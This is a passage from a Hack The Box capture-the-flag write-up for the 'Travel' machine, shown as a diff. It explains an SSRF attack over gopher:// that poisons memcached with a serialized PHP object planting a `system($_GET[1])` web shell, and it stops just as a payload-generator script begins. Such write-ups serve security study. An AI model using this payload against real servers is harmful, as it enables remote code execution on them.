zoeyg/public-write-ups/hack-the-box/travel.md

 `set xct_debe7386b5352dfae5de0601d7c1f670 4 0 128 O:14:"TemplateHelper":2:{s:20:".TemplateHelper.file";s:5:"s.php";s:20:".TemplateHelper.data";s:26:"<?php system($_GET[1]); ?>";}`

 After some googling we find that we can utilize the `gopher://`(https://hackerone.com/reports/115748) protocol to send newlines with an underscore after the host:port, and %0a for new lines.
-Testing this against a local memcached server though, resulted in an error: `CLIENT_ERROR bad data chunk`.
 After a little more searching we find a tool https://github.com/tarunkant/Gopherus.
-Using gopherus for our payload is a bit tricky given that we can't copy/paste in the null bytes properly(which
-I learned the hard way), and it seems to calculate the length improperly if we pass the urlencoded payload.
+Using gopherus for our payload is a bit tricky given that we can't copy/paste in the null bytes properly(which I learned the hard way), and it seems to calculate the length improperly if we pass the urlencoded payload.
 Also, `+`'s in the url don't seem to work.
 I had to learn all this through trial and error and replicating the box setup on my own machine(an exercise left to the reader).
 Let's modify our php script to generate a payload:

 ```php
 <?php